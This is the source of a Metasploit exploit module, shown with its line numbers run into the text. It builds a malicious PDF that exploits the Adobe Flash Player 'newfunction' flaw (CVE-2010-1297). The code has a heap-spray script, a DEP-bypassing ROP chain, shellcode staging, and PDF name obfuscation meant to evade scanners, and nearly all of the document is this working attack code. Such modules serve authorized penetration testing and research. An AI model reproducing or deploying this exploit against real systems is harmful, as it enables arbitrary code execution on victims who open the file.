Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'zlib'67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::FILEFORMAT1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',17'Description' => %q{18This module exploits a vulnerability in the DoABC tag handling within19versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also20vulnerable, as are any other applications that may embed Flash player.2122Arbitrary code execution is achieved by embedding a specially crafted Flash23movie into a PDF document. An AcroJS heap spray is used in order to ensure24that the memory used by the invalid pointer issue is controlled.2526NOTE: This module uses a similar DEP bypass method to that used within the27adobe_libtiff module. This method is unlikely to work across various28Windows versions due a the hardcoded syscall number.29},30'License' => MSF_LICENSE,31'Author' => [32'Unknown', # Found being openly exploited33'jduck' # Metasploit version34],35'References' => [36['CVE', '2010-1297'],37['OSVDB', '65141'],38['BID', '40586'],39['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],40# For SWF->PDF embedding41['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']42],43'DefaultOptions' => {44'EXITFUNC' => 'process',45'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',46'DisablePayloadHandler' => true47},48'Payload' => {49'Space' => 1000,50'BadChars' => "\x00",51'DisableNops' => true52},53'Platform' => 'win',54'Targets' => [55# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd56# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd57# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd58[ 'Automatic', {}],59],60'DisclosureDate' => '2010-06-04',61'DefaultTarget' => 0,62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66}67)68)6970register_options(71[72OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),73]74)75end7677def exploit78swf_data = make_swf()79js_data = make_js(payload.encoded)8081# Create the pdf82pdf = make_pdf(swf_data, js_data)8384print_status("Creating '#{datastore['FILENAME']}' file...")8586file_create(pdf)87end8889def make_swf90# load the static swf file91path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")92fd = File.open(path, "rb")93swf_data = fd.read(fd.stat.size)94fd.close95swf_data96end9798def make_js(encoded_payload)99# The following executes a ret2lib using BIB.dll100# The effect is to bypass DEP and execute the shellcode in an indirect way101stack_data = [1020xc0c0c0c,1030x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret1040xcccccccc,1050x70048ef, # xchg eax,esp / ret1060x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]1070xcccccccc,1080x7009084, # ret1090x7009084, # ret1100x7009084, # ret1110x7009084, # ret1120x7009084, # ret1130x7009084, # ret1140x7009033, # ret 0x181150x7009084, # ret1160xc0c0c0c,1170x7009084, # ret1180x7009084, # ret1190x7009084, # ret1200x7009084, # ret1210x7009084, # ret1220x7009084, # ret1230x7009084, # ret1240x7009084, # ret1250x7001599, # pop ebp / ret1260x10124,1270x70072f7, # pop eax / ret1280x10104,1290x70015bb, # pop ecx / ret1300x1000,1310x700154d, # mov [eax], ecx / ret1320x70015bb, # pop ecx / ret1330x7ffe0300, # -- location of KiFastSystemCall1340x7007fb2, # mov eax, [ecx] / ret1350x70015bb, # pop ecx / ret1360x10011,1370x700a8ac, # mov [ecx], eax / xor eax,eax / ret1380x70015bb, # pop ecx / ret1390x10100,1400x700a8ac, # mov [ecx], eax / xor eax,eax / ret1410x70072f7, # pop eax / ret1420x10011,1430x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)1440x7005c54, # pop esi / add esp,0x14 / ret1450xffffffff,1460x10100,1470x0,1480x10104,1490x1000,1500x40,151# The next bit effectively copies data from the interleaved stack to the memory152# pointed to by eax153# The data copied is:154# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83155# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff156# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x901570x700d731, # mov eax, [ebp-0x24] / ret1580x70015bb, # pop ecx / ret1590x9054905a,1600x700154d, # mov [eax], ecx / ret1610x700a722, # add eax, 4 / ret1620x70015bb, # pop ecx / ret1630x5815eb5a,1640x700154d, # mov [eax], ecx / ret1650x700a722, # add eax, 4 / ret1660x70015bb, # pop ecx / ret1670x18891a8b,1680x700154d, # mov [eax], ecx / ret1690x700a722, # add eax, 4 / ret1700x70015bb, # pop ecx / ret1710x8304c083,1720x700154d, # mov [eax], ecx / ret1730x700a722, # add eax, 4 / ret1740x70015bb, # pop ecx / ret1750xfb8104c2,1760x700154d, # mov [eax], ecx / ret1770x700a722, # add eax, 4 / ret1780x70015bb, # pop ecx / ret1790xc0c0c0c,1800x700154d, # mov [eax], ecx / ret1810x700a722, # add eax, 4 / ret1820x70015bb, # pop ecx / ret1830x5ebee75,1840x700154d, # mov [eax], ecx / ret1850x700a722, # add eax, 4 / ret1860x70015bb, # pop ecx / ret1870xffffe6e8,1880x700154d, # mov [eax], ecx / ret1890x700a722, # add eax, 4 / ret1900x70015bb, # pop ecx / ret1910x909090ff,1920x700154d, # mov [eax], ecx / ret1930x700a722, # add eax, 4 / ret1940x70015bb, # pop ecx / ret1950x90909090,1960x700154d, # mov [eax], ecx / ret1970x700a722, # add eax, 4 / ret1980x70015bb, # pop ecx / ret1990x90909090,2000x700154d, # mov [eax], ecx / ret2010x700a722, # add eax, 4 / ret2020x70015bb, # pop ecx / ret2030x90ffffff,2040x700154d, # mov [eax], ecx / ret2050x700d731, # mov eax, [ebp-0x24] / ret2060x700112f # call eax -- (execute stub to transition to full shellcode)207].pack('V*')208209var_unescape = rand_text_alpha(rand(100) + 1)210var_shellcode = rand_text_alpha(rand(100) + 1)211212var_start = rand_text_alpha(rand(100) + 1)213214var_s = 0x10000215var_c = rand_text_alpha(rand(100) + 1)216var_b = rand_text_alpha(rand(100) + 1)217var_d = rand_text_alpha(rand(100) + 1)218var_3 = rand_text_alpha(rand(100) + 1)219var_i = rand_text_alpha(rand(100) + 1)220var_4 = rand_text_alpha(rand(100) + 1)221222payload_buf = ''223payload_buf << stack_data224payload_buf << encoded_payload225226escaped_payload = Rex::Text.to_unescape(payload_buf)227228js = %Q|229var #{var_unescape} = unescape;230var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );231var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );232while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};233#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);234#{var_b} += #{var_shellcode};235#{var_b} += #{var_c};236#{var_d} = #{var_b}.substring(0, #{var_s}/2);237while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};238#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);239var #{var_4} = new Array();240for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";241|242243js244end245246def random_non_ascii_string(count)247result = ""248count.times do249result << (rand(128) + 128).chr250end251result252end253254def io_def(id)255"%d 0 obj\n" % id256end257258def io_ref(id)259"%d 0 R" % id260end261262# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/263def n_obfu(str)264result = ""265str.scan(/./u) do |c|266if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'267result << "#%x" % c.unpack("C*")[0]268else269result << c270end271end272result273end274275def ascii_hex_whitespace_encode(str)276result = ""277whitespace = ""278str.each_byte do |b|279result << whitespace << "%02x" % b280whitespace = " " * (rand(3) + 1)281end282result << ">"283end284285def make_pdf(swf, js)286swf_name = rand_text_alpha(8 + rand(8)) + ".swf"287288xref = []289eol = "\n"290endobj = "endobj" << eol291292# Randomize PDF version?293pdf = "%PDF-1.5" << eol294# pdf << "%" << random_non_ascii_string(4) << eol295296# catalog297xref << pdf.length298pdf << io_def(1) << n_obfu("<</Type/Catalog")299pdf << n_obfu("/Pages ") << io_ref(3)300pdf << n_obfu("/OpenAction ") << io_ref(5)301pdf << n_obfu(">>")302pdf << eol << endobj303304# pages array305xref << pdf.length306pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj307308# page 1309xref << pdf.length310pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)311pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")312pdf << n_obfu(">>")313pdf << eol << endobj314315# js action316xref << pdf.length317pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj318319# js stream320xref << pdf.length321compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))322pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol323pdf << "stream" << eol324pdf << compressed << eol325pdf << "endstream" << eol326pdf << endobj327328# swf annotation object329xref << pdf.length330pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")331pdf << n_obfu("/Rect [20 20 187 69] ")332pdf << n_obfu("/RichMediaSettings ") << io_ref(8)333pdf << n_obfu("/RichMediaContent ") << io_ref(9)334pdf << n_obfu("/NM (") << swf_name << n_obfu(")")335pdf << n_obfu(">>")336pdf << eol << endobj337338# rich media settings339xref << pdf.length340pdf << io_def(8)341pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")342pdf << n_obfu("/Activation ") << io_ref(10)343pdf << n_obfu("/Deactivation ") << io_ref(11)344pdf << n_obfu(">>")345pdf << eol << endobj346347# rich media content348xref << pdf.length349pdf << io_def(9)350pdf << n_obfu("<</Type/RichMediaContent")351pdf << n_obfu("/Assets ") << io_ref(12)352pdf << n_obfu("/Configurations [") << io_ref(14) << "]"353pdf << n_obfu(">>")354pdf << eol << endobj355356# rich media activation / deactivation357xref << pdf.length358pdf << io_def(10)359pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")360pdf << eol << endobj361362xref << pdf.length363pdf << io_def(11)364pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")365pdf << eol << endobj366367# rich media assets368xref << pdf.length369pdf << io_def(12)370pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")371pdf << eol << endobj372373# swf embeded file ref374xref << pdf.length375pdf << io_def(13)376pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")377pdf << eol << endobj378379# rich media configuration380xref << pdf.length381pdf << io_def(14)382pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")383pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")384pdf << eol << endobj385386# rich media isntance387xref << pdf.length388pdf << io_def(15)389pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")390pdf << n_obfu("/Asset ") << io_ref(13)391pdf << n_obfu(">>")392pdf << eol << endobj393394# swf stream395# NOTE: This data is already compressed, no need to compress it again...396xref << pdf.length397pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol398pdf << "stream" << eol399pdf << swf << eol400pdf << "endstream" << eol401pdf << endobj402403# trailing stuff404xrefPosition = pdf.length405pdf << "xref" << eol406pdf << "0 %d" % (xref.length + 1) << eol407pdf << "0000000000 65535 f" << eol408xref.each do |index|409pdf << "%010d 00000 n" % index << eol410end411412pdf << "trailer" << eol413pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol414415pdf << "startxref" << eol416pdf << xrefPosition.to_s() << eol417418pdf << "%%EOF" << eol419420end421end422423424